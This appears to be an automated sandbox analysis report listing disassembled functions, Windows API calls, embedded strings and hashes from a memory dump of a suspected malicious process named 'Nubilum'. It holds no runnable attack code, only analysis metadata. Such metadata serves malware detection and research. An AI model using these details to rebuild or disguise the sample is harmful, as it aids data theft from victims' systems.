                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                          • API String ID: 3510742995-2446657581
                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                          • memset.MSVCRT ref: 00405ABB
                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                          • SetFocus.USER32(?), ref: 00405B76
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: MessageSend$FocusItemmemset
                          • String ID:
                          • API String ID: 4281309102-0
                          • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                          • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintfwcscat
                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                          • API String ID: 384018552-4153097237
                          • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                          • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetwcschr
                          • String ID: 0$6
                          • API String ID: 2029023288-3849865405
                          • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                          • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                          APIs
                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                          • memset.MSVCRT ref: 00405455
                          • memset.MSVCRT ref: 0040546C
                          • memset.MSVCRT ref: 00405483
                          • memcpy.MSVCRT ref: 00405498
                          • memcpy.MSVCRT ref: 004054AD
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$memcpy$ErrorLast
                          • String ID: 6$\
                          • API String ID: 404372293-1284684873
                          • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                          • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                          • wcscpy.MSVCRT ref: 0040A0D9
                          • wcscat.MSVCRT ref: 0040A0E6
                          • wcscat.MSVCRT ref: 0040A0F5
                          • wcscpy.MSVCRT ref: 0040A107
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                          • String ID:
                          • API String ID: 1331804452-0
                          • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                          • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                          APIs
                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: advapi32.dll
                          • API String ID: 2012295524-4050573280
                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                          APIs
                          Strings
                          • <%s>, xrefs: 004100A6
                          • <?xml version="1.0" ?>, xrefs: 0041007C
                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                          • API String ID: 3473751417-2880344631
                          • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                          • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset
                          • String ID: %2.2X
                          • API String ID: 2521778956-791839006
                          • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                          • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintfwcscpy
                          • String ID: dialog_%d$general$menu_%d$strings
                          • API String ID: 999028693-502967061
                          • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                          • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memsetstrlen
                          • String ID:
                          • API String ID: 2350177629-0
                          • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                          • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                          • API String ID: 2221118986-1606337402
                          • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                          • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                          • String ID:
                          • API String ID: 265355444-0
                          • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                          • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                          • memset.MSVCRT ref: 0040C439
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                          • _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          • memset.MSVCRT ref: 0040C4D0
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                          • String ID:
                          • API String ID: 1973883786-0
                          • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                          • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                          APIs
                          • memset.MSVCRT ref: 004116FF
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2618321458-3614832568
                          • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                          • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                          APIs
                          • memset.MSVCRT ref: 004185FC
                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@AttributesFilememset
                          • String ID:
                          • API String ID: 776155459-0
                          • Opcode ID: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                          • Opcode Fuzzy Hash: 7cf80b7bcafbae618536fb4bc093b34167423ba0ffe002ce62182f5d73f8b864
                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                          • malloc.MSVCRT ref: 00417524
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                          • String ID:
                          • API String ID: 2308052813-0
                          • Opcode ID: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                          • Opcode Fuzzy Hash: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                          APIs
                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PathTemp$??3@
                          • String ID: %s\etilqs_$etilqs_
                          • API String ID: 1589464350-1420421710
                          • Opcode ID: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                          • Opcode Fuzzy Hash: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                          APIs
                          • memset.MSVCRT ref: 0040FDD5
                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 0040FE1F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                          • String ID: <%s>%s</%s>$</item>$<item>
                          • API String ID: 1775345501-2769808009
                          • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                          • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                          APIs
                          • wcscpy.MSVCRT ref: 0041477F
                          • wcscpy.MSVCRT ref: 0041479A
                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
